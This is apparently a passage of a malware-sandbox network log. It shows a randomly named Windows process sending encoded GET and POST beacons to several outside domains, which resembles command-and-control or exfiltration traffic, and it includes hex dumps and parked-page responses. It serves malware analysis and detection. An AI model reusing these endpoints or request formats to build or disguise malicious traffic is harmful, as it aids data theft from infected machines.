57 33 61 35 44 41 6a 76 4f 78 74 43 66 77 76 36 4d 4e 34 4f 58 4f 67 6e 70 38 4e 6d 4e 34 6c 6b 65 48 61 52 35 6d 4d 6e 4a 6e 2f 57 49 69 61 51 43 78 7a 66 4e 77 69 61 73 6f 4d 31 78 4e 74 41 67 78 78 4d 44 63 68 4b 6c 69 45 39 6a 42 4d 4f 51 71 47 63 77 51 55 61 30 78 47 78 57 68 2f 4b 51 43 79 6a 56 47 41 71 66 38 73 62 4e 32 44 7a 42 6f 4b 79 6e 6f 4b 67 39 43 30 57 41 5a 35 6a 75 37 61 63 35 64 31 52 69 56 36 34 38 63 6f 77 38 45 4a 70 71 51 37 6d 42 2f 51 32 43 64 68 43 35 56 2b 38 4a 6d 48 79 69 54 42 66 43 69 76 73 52 56 43 54 6d 4e 55 65 4f 62 58 4b 54 47 2b 45 67 65 76 58 6e 69 69 41 65 62 63 58 44 69 75 67 64 6d 59 49 49 2f 2f 74 75 63 6f 4a 70 50 76 2b 72 41 57 [TRUNCATED] Data Ascii: O2ePNNH0=3mBp5/R5122skRd0nj3Gpf3X38XI4Lr3dOvvCEHm+0uZOwrFO+TEtxHDjdtcKsbWAT50GW5UjFkTQzgbzobqgZLZVtjzCvM0X1Jw/qW3a5DAjvOxtCfwv6MN4OXOgnp8NmN4lkeHaR5mMnJn/WIiaQCxzfNwiasoM1xNtAgxxMDchKliE9jBMOQqGcwQUa0xGxWh/KQCyjVGAqf8sbN2DzBoKynoKg9C0WAZ5ju7ac5d1RiV648cow8EJpqQ7mB/Q2CdhC5V+8JmHyiTBfCivsRVCTmNUeObXKTG+EgevXniiAebcXDiugdmYII//tucoJpPv+rAWvRldR3eBLApZIUQrMgXFP7GLTg7FJiomfIqM2XSSl80+rhBjDlNJ63XugfbhcOMVRHsJV4y3Y27RMVJfxLHEgkKzHJH2GSmWpng8di+5QqhLmHLyVQ05Rrzq15pFE9kZ/B8vbrblfXLRDmPKKvxvsVqiYHhRHCcYv4BNORGS8kuxfRw7nzUKPVhHZJQzyVZAJ8PvzI7nX5oc5rQbbyvPHiQWivoTIjQPL35IVrb0jXWWZnZsdeXurZdGNZJRB3s1mWR+JIlTB1yGXx/77Oo7RmIERXscsCAs4v1wvX+P0y91D6/WtSsQkmbB/u3OJOb7stNZEyOAyPSVgutKfgUgopJ/dPZ2RU2MahiHXBWQdwJC1ZCEDDkX0053B5Fl7aJtCclDXCuVZBgkw1pBkx3EaUkM6q9zPgEUMHi0QUTfZqBx55U3DiSDt//5fUaiemaifDZzLjDhi0Lg6xXrdTakkpaRo+bG0uaXABXte9tNH7y6HymnsXDn0TZlNvlzf+RGqJpZbUoHGfDfweqC79o7QAIn2ObDkIGMwxG+DGdN99aI9K7j2FU+JJm+Z3vYMYHDQzYAKzJOlysGSI7cWktr7ig/z3+8BERtApu8Bshz+IjDzWssoXUBDe7CuJbVkYkuN9Qsar2bXglBuZ91muwSA6HyDiPh6JqGt2 [TRUNCATED]
Jan 6, 2025 16:04:56.318329096 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 06 Jan 2025 15:04:55 GMT content-type: text/html; charset=utf-8 content-length: 1102 x-request-id: 5003a026-7772-427e-9f60-75d80b9c935b cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg== set-cookie: parking_session=5003a026-7772-427e-9f60-75d80b9c935b; expires=Mon, 06 Jan 2025 15:19:56 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 71 36 72 45 69 33 63 58 6c 45 30 41 37 67 6f 58 6f 49 33 46 6a 44 70 65 32 49 72 30 74 47 71 36 69 62 4d 6a 75 56 56 4c 67 4d 79 4a 35 36 33 74 6c 7a 48 49 39 7a 56 79 33 44 42 2f 78 38 4c 6d 6f 6f 33 6a 43 6d 35 62 4e 74 6c 75 68 46 68 33 53 64 6c 48 70 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_q6rEi3cXlE0A7goXoI3FjDpe2Ir0tGq6ibMjuVVLgMyJ563tlzHI9zVy3DB/x8Lmoo3jCm5bNtluhFh3SdlHpg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 6, 2025 16:04:56.318353891 CET	555	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTAwM2EwMjYtNzc3Mi00MjdlLTlmNjAtNzVkODBiOWM5MzViIiwicGFnZV90aW1lIjoxNzM2MTc1OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	60446	199.59.243.228	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:04:58.395519018 CET	476	OUT	GET /gott/?O2ePNNH0=6kpJ6LpNwGTQjQFv9wT0vKrg7LyU1Ky+dbP4DmTHwDi6SRHyD6uQyy/krsAgEdDgCRluenpg23EjeT8+1f7IhoeiV8r7Y+8cTGMdsaGZVrW7s+26pDLbmq8chOO3l2d4Xg==&56-H=2t2xuzpX2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.sql.dance Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)
Jan 6, 2025 16:04:58.887651920 CET	1236	IN	HTTP/1.1 200 OK date: Mon, 06 Jan 2025 15:04:58 GMT content-type: text/html; charset=utf-8 content-length: 1490 x-request-id: 60ebf132-1d45-476b-8fc0-82e671e672b9 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vB8KRVcwxJYawLPhTgB7La6MDFE5Ww9bGPIg2sAuh68RjrImMHfBJqPUm6uF8FCYEciejs85hu/m5B2s4hPdlA== set-cookie: parking_session=60ebf132-1d45-476b-8fc0-82e671e672b9; expires=Mon, 06 Jan 2025 15:19:58 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 42 38 4b 52 56 63 77 78 4a 59 61 77 4c 50 68 54 67 42 37 4c 61 36 4d 44 46 45 35 57 77 39 62 47 50 49 67 32 73 41 75 68 36 38 52 6a 72 49 6d 4d 48 66 42 4a 71 50 55 6d 36 75 46 38 46 43 59 45 63 69 65 6a 73 38 35 68 75 2f 6d 35 42 32 73 34 68 50 64 6c 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vB8KRVcwxJYawLPhTgB7La6MDFE5Ww9bGPIg2sAuh68RjrImMHfBJqPUm6uF8FCYEciejs85hu/m5B2s4hPdlA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Jan 6, 2025 16:04:58.887734890 CET	943	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjBlYmYxMzItMWQ0NS00NzZiLThmYzAtODJlNjcxZTY3MmI5IiwicGFnZV90aW1lIjoxNzM2MTc1OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	60447	38.22.89.164	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:05:04.357958078 CET	745	OUT	POST /ucix/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.811371bb10.buzz Origin: http://www.811371bb10.buzz Referer: http://www.811371bb10.buzz/ucix/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 43 74 6f 41 2b 6d 50 6d 7a 2b 4a 2f 45 6b 75 61 35 6e 75 61 53 45 34 6d 59 55 62 43 77 51 76 37 66 73 47 44 46 54 6b 76 50 53 53 4d 41 76 52 78 57 69 53 4d 72 70 47 70 73 7a 67 74 42 32 37 44 4e 54 4e 62 6a 34 75 48 55 2f 6c 77 6f 53 53 65 4c 31 69 72 51 70 63 32 69 44 75 44 37 4b 57 77 67 4d 64 69 78 67 79 4a 44 78 30 68 7a 71 63 6c 34 74 35 44 62 73 32 77 36 6d 32 4e 70 72 6e 79 4a 48 61 6c 35 45 67 30 64 63 6d 62 30 37 77 61 71 44 4b 75 69 70 49 76 39 64 42 6b 6f 71 4c 77 4f 76 66 37 6c 79 4e 58 65 78 33 58 5a 75 36 33 35 32 35 49 74 56 34 2b 51 75 75 33 63 57 6e 61 4b 53 57 74 7a 38 59 3d Data Ascii: O2ePNNH0=CtoA+mPmz+J/Ekua5nuaSE4mYUbCwQv7fsGDFTkvPSSMAvRxWiSMrpGpszgtB27DNTNbj4uHU/lwoSSeL1irQpc2iDuD7KWwgMdixgyJDx0hzqcl4t5Dbs2w6m2NprnyJHal5Eg0dcmb07waqDKuipIv9dBkoqLwOvf7lyNXex3XZu63525ItV4+Quu3cWnaKSWtz8Y=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	60448	38.22.89.164	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:05:06.914915085 CET	765	OUT	POST /ucix/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.811371bb10.buzz Origin: http://www.811371bb10.buzz Referer: http://www.811371bb10.buzz/ucix/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 43 74 6f 41 2b 6d 50 6d 7a 2b 4a 2f 57 56 65 61 2b 77 36 61 44 30 34 6c 64 55 62 43 70 41 76 2f 66 73 36 44 46 52 49 2f 54 30 36 4d 41 4b 39 78 58 6d 47 4d 73 70 47 70 6e 54 67 53 4d 57 37 49 4e 55 46 39 6a 35 53 48 55 2f 68 77 6f 58 32 65 58 53 4f 6f 54 5a 63 34 33 7a 75 42 31 71 57 77 67 4d 64 69 78 67 6d 76 44 78 38 68 7a 59 49 6c 36 4d 35 45 57 4d 32 78 39 6d 32 4e 74 72 6e 32 4a 48 61 69 35 42 42 5a 64 65 65 62 30 34 6b 61 71 53 4b 68 6f 70 49 31 69 74 41 31 34 37 53 2f 49 50 7a 2b 6b 77 56 51 51 7a 32 76 59 59 4c 64 6a 55 78 4f 75 56 51 56 51 74 47 42 5a 68 36 79 51 78 47 64 74 72 4e 71 67 4b 31 36 50 35 6c 34 33 66 72 37 69 70 5a 39 71 51 70 49 Data Ascii: O2ePNNH0=CtoA+mPmz+J/WVea+w6aD04ldUbCpAv/fs6DFRI/T06MAK9xXmGMspGpnTgSMW7INUF9j5SHU/hwoX2eXSOoTZc43zuB1qWwgMdixgmvDx8hzYIl6M5EWM2x9m2Ntrn2JHai5BBZdeeb04kaqSKhopI1itA147S/IPz+kwVQQz2vYYLdjUxOuVQVQtGBZh6yQxGdtrNqgK16P5l43fr7ipZ9qQpI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	60449	38.22.89.164	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:05:09.463754892 CET	1782	OUT	POST /ucix/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.811371bb10.buzz Origin: http://www.811371bb10.buzz Referer: http://www.811371bb10.buzz/ucix/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1245 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 43 74 6f 41 2b 6d 50 6d 7a 2b 4a 2f 57 56 65 61 2b 77 36 61 44 30 34 6c 64 55 62 43 70 41 76 2f 66 73 36 44 46 52 49 2f 54 30 79 4d 42 38 70 78 57 42 36 4d 74 70 47 70 71 7a 67 54 4d 57 37 5a 4e 53 74 35 6a 35 65 39 55 39 70 77 79 78 36 65 48 6e 36 6f 49 70 63 34 6f 6a 75 45 37 4b 57 66 67 4e 74 6d 78 6a 65 76 44 78 38 68 7a 5a 34 6c 7a 39 35 45 46 63 32 77 36 6d 32 52 70 72 6e 65 4a 48 43 55 35 42 4e 76 63 75 2b 62 31 59 30 61 6f 67 69 68 67 70 49 7a 6a 74 41 74 34 37 76 2f 49 50 76 59 6b 78 68 32 51 78 6d 76 56 63 6d 71 38 6b 35 6b 31 48 4d 37 5a 39 4f 64 65 77 79 69 5a 43 4f 72 77 63 78 51 73 50 41 62 48 49 46 65 30 59 32 51 68 6f 46 41 6f 58 6b 6f 34 42 47 61 2b 67 6e 79 4d 49 4d 75 58 72 4c 76 72 4a 7a 58 69 49 47 6b 64 41 74 6b 37 45 54 63 6b 35 42 5a 68 35 66 4f 4c 6f 4e 75 46 77 6c 56 4a 45 69 4b 34 70 2b 50 2f 6b 75 74 33 45 62 62 61 75 63 37 49 4c 48 78 61 46 58 6c 45 55 44 37 75 73 42 6f 4b 46 75 37 55 38 6f 34 33 7a 6e 7a 78 78 62 78 41 38 6d 59 6c 7a 45 2f 6c [TRUNCATED] Data Ascii: O2ePNNH0=CtoA+mPmz+J/WVea+w6aD04ldUbCpAv/fs6DFRI/T0yMB8pxWB6MtpGpqzgTMW7ZNSt5j5e9U9pwyx6eHn6oIpc4ojuE7KWfgNtmxjevDx8hzZ4lz95EFc2w6m2RprneJHCU5BNvcu+b1Y0aogihgpIzjtAt47v/IPvYkxh2QxmvVcmq8k5k1HM7Z9OdewyiZCOrwcxQsPAbHIFe0Y2QhoFAoXko4BGa+gnyMIMuXrLvrJzXiIGkdAtk7ETck5BZh5fOLoNuFwlVJEiK4p+P/kut3Ebbauc7ILHxaFXlEUD7usBoKFu7U8o43znzxxbxA8mYlzE/lBCVjL2HBwkNwinqIcZQmtGJF6Ak1qQnoVGz8tbFaWnzWoqUIVVq8mKLvyQoCABb4ANOS241VOmb31IX4uUZLanewP8hs9j84gGuUg/35b3OQ+bIMwAKIUBSnEcHUAKA7k8387yRgIKYY9sH1vsAB4OQel/IYILPHqHhERGHaGNbJPNwcqaK9wRLDTR1AKB7Wc1NRBf3L3LBxmyzWu5iXs4AFLzujPgYa5U7udEdbVKXMjevnQf5MmuRjlN+4YoyMb6YrvusMS8YBUuhz1iVVBBGjb5YjJLjNweF8cfCfxdwQg04fsNygP9kE28gGDldk4iupXMmXllctaIj32hBJfxubjboIALd65uLIee7w6rS2PG8GsYPNKYU2VUI36PEkTnS/gK6+7id3O3PGdMQ+p+pwQcF/N6syKHDk64zHRXGa+ORdzgGFCf1nhFrPyJy8OqkLnJCcyHnnZg3P33A+3m6WzH+cqe8IP14zUfM0/72PsQDGpQ6YFGLEudBX2uj1JzDdLPKtUlSzg5s+G/QUOsxWdJmXtsijiGaFIm7uQKdWi1lW3pXIOUr0Ub2CuTHJnG7g79s+oRm95iVVu6vnBEuXk9bHLrcSU8v4nS2wt67UP/YlpitZ1hW6BwLV9JCO5+Y6MqFPrHpyolqAoMQM0BKFv9JhGsvOzG [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	60450	38.22.89.164	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:05:12.002791882 CET	482	OUT	GET /ucix/?O2ePNNH0=PvAg9QCS6Z5JTHKcjy7JUmQHcUGckiODdvenPAgfZzfjFvd/bCKGmpWiozs7PE3CLHF555uBY/gZrXu5AFygOLFU2gGDn9aYvOg0rFqJEB5O9KgryNVgV9zNl1vTlYWlaw==&56-H=2t2xuzpX2 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.811371bb10.buzz Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	60451	68.65.122.71	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:05:38.467684984 CET	733	OUT	POST /csd1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.rtp189z.lat Origin: http://www.rtp189z.lat Referer: http://www.rtp189z.lat/csd1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 209 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 35 6a 66 32 7a 6a 66 64 64 38 37 63 45 5a 7a 66 59 47 39 45 36 32 59 63 69 75 48 4c 69 66 34 39 2b 30 33 70 39 68 43 46 64 59 76 6e 7a 31 69 66 74 36 46 72 69 43 59 39 45 30 65 2b 45 6c 56 70 46 51 65 68 42 4c 73 68 53 39 39 6b 4f 53 30 76 41 4f 42 51 65 78 67 34 77 42 4f 2b 70 57 32 67 41 4e 4e 55 68 44 63 5a 75 37 77 57 71 36 4a 79 58 75 37 41 33 52 52 46 50 2f 51 32 43 35 36 56 66 65 39 4a 31 67 66 61 77 4b 73 56 51 59 78 43 57 69 6c 45 77 73 6b 63 52 55 2f 61 36 63 58 65 67 78 79 65 2f 65 61 49 77 2b 34 33 62 70 44 72 4a 70 55 58 55 57 49 4e 74 41 76 67 37 35 70 33 6c 5a 33 67 6b 31 6f 3d Data Ascii: O2ePNNH0=5jf2zjfdd87cEZzfYG9E62YciuHLif49+03p9hCFdYvnz1ift6FriCY9E0e+ElVpFQehBLshS99kOS0vAOBQexg4wBO+pW2gANNUhDcZu7wWq6JyXu7A3RRFP/Q2C56Vfe9J1gfawKsVQYxCWilEwskcRU/a6cXegxye/eaIw+43bpDrJpUXUWINtAvg75p3lZ3gk1o=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	60452	68.65.122.71	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:05:41.027708054 CET	753	OUT	POST /csd1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.rtp189z.lat Origin: http://www.rtp189z.lat Referer: http://www.rtp189z.lat/csd1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 229 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 35 6a 66 32 7a 6a 66 64 64 38 37 63 57 70 6a 66 55 46 6c 45 38 57 59 62 74 4f 48 4c 72 2f 34 35 2b 30 4c 70 39 6b 6d 56 63 72 4c 6e 79 51 47 66 72 4c 46 72 68 43 59 39 4b 55 65 37 5a 31 56 59 46 51 6a 4c 42 50 77 68 53 38 64 6b 4f 57 77 76 41 39 70 54 63 68 67 36 37 68 4f 38 30 47 32 67 41 4e 4e 55 68 41 67 67 75 2f 55 57 71 72 35 79 58 4d 54 44 2b 78 52 47 49 2f 51 32 47 35 36 52 66 65 38 65 31 68 43 4e 77 50 6f 56 51 64 31 43 57 7a 6c 4c 6c 63 6b 65 63 30 2b 66 71 76 4f 50 75 54 44 38 35 74 48 70 76 66 63 76 61 66 79 42 54 4c 63 52 58 57 67 6d 74 44 48 57 2b 4f 30 66 2f 36 6e 51 36 69 2b 32 74 37 36 4e 71 75 76 4a 35 6d 47 4e 58 45 36 77 43 41 45 77 Data Ascii: O2ePNNH0=5jf2zjfdd87cWpjfUFlE8WYbtOHLr/45+0Lp9kmVcrLnyQGfrLFrhCY9KUe7Z1VYFQjLBPwhS8dkOWwvA9pTchg67hO80G2gANNUhAggu/UWqr5yXMTD+xRGI/Q2G56Rfe8e1hCNwPoVQd1CWzlLlckec0+fqvOPuTD85tHpvfcvafyBTLcRXWgmtDHW+O0f/6nQ6i+2t76NquvJ5mGNXE6wCAEw

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	60453	68.65.122.71	80	2856	C:\Program Files (x86)\OostHZCdWIsKYUFVydBLowRDXbIWoLhIyJETsRoUGUcBkfiVQSmLmkiSrqyt\CdarBkjFTHWBQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 6, 2025 16:05:43.566957951 CET	1770	OUT	POST /csd1/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.rtp189z.lat Origin: http://www.rtp189z.lat Referer: http://www.rtp189z.lat/csd1/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1245 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Win64; x64; Trident/8.0) Data Raw: 4f 32 65 50 4e 4e 48 30 3d 35 6a 66 32 7a 6a 66 64 64 38 37 63 57 70 6a 66 55 46 6c 45 38 57 59 62 74 4f 48 4c 72 2f 34 35 2b 30 4c 70 39 6b 6d 56 63 72 44 6e 7a 69 4f 66 74 59 64 72 67 43 59 39 56 6b 65 36 5a 31 56 42 46 51 4c 50 42 50 39 44 53 35 5a 6b 4f 31 34 76 49 73 70 54 56 68 67 36 30 42 4f 35 70 57 33 39 41 4e 64 51 68 41 77 67 75 2f 55 57 71 6f 68 79 65 2b 37 44 34 78 52 46 50 2f 51 79 43 35 37 45 66 65 6b 4f 31 68 58 77 77 37 63 56 52 39 6c 43 58 46 52 4c 6e 38 6b 6d 5a 30 2b 35 71 76 7a 58 75 54 65 4e 35 75 61 38 76 59 6f 76 59 6f 33 59 44 49 73 78 4c 31 59 6f 69 30 58 72 6c 70 38 76 39 73 75 69 36 43 4b 4d 6e 74 2f 74 38 75 76 76 7a 6d 4b 44 4c 51 61 59 44 46 59 37 65 67 69 30 58 45 33 51 4c 67 4e 35 2b 35 4b 79 69 30 59 75 42 45 39 70 6a 47 39 63 4c 55 47 69 35 4e 59 62 39 4f 4c 62 51 32 58 4d 4f 6f 32 65 50 57 30 2f 46 6e 51 66 51 45 6d 6f 55 79 32 43 4c 33 48 38 6a 56 7a 63 64 70 55 65 66 4c 4a 50 5a 4c 2f 4b 58 4b 2b 6e 72 32 50 2b 68 59 66 43 74 56 4e 39 69 53 37 44 43 30 7a 6f 75 [TRUNCATED] Data Ascii: 